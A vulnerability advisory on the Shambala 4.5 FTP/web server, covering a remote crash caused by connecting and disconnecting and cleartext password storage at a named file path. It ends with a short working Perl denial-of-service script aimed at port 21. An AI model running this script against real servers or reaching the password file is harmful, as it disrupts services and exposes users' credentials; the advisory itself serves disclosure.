|
|
|
|
| |
| Shambala is a low cost, multi-featured FTP and Web server distributed by Evolvable Corporation. It is used by numerous amateur and small office/home webmasters as an economical way to launch and manage a website. A problem with Shambala's mishandling of connections and disconnections would potentially enable a simple denial-of-service attack. A second observation is Shambala's storage of passwords in cleartext on the server: a major problem on Windows 95 and 98 platforms. |
| |
Credit:
The information has been provided by Niels Heinen.
|
| |
Vulnerable systems:
Shambala version 4.5
Shambala does not handle all connections correctly. It is therefore possible to remotely crash the ftp server using a custom script that automates the action of opening and closing a connection to and from the server. The server crashes upon disconnection and gives the following error:
Run-time error `20127` invalid ConnectionID
The second problem is that Shambala stores all passwords in plain text on the server:
c:\program files\shambala\passwords.txt
This is not such a big deal on an NT server as permissions could be set to deny access to this file. Because the server is also shipped for Windows 95 and Windows 98, it could be possible for any user to gain access to the file.
Exploit (DoS):
---cut-here---
#!/usr/bin/perl
#
# This tool (tool not exploit!) crashes shambala server 4.5
# This is a stripped version of Guido Bakkers exploit code (bedankt)
#
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
&usage if !defined($args{s});
$serv = $args{s};
$EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print "Done...\n";
exit; # remove this and the server will *NOT* crash
sub usage {die("\n$0 -s ipaddress\n\n");}
---cut-here---
|
|
|
|
|
|
|
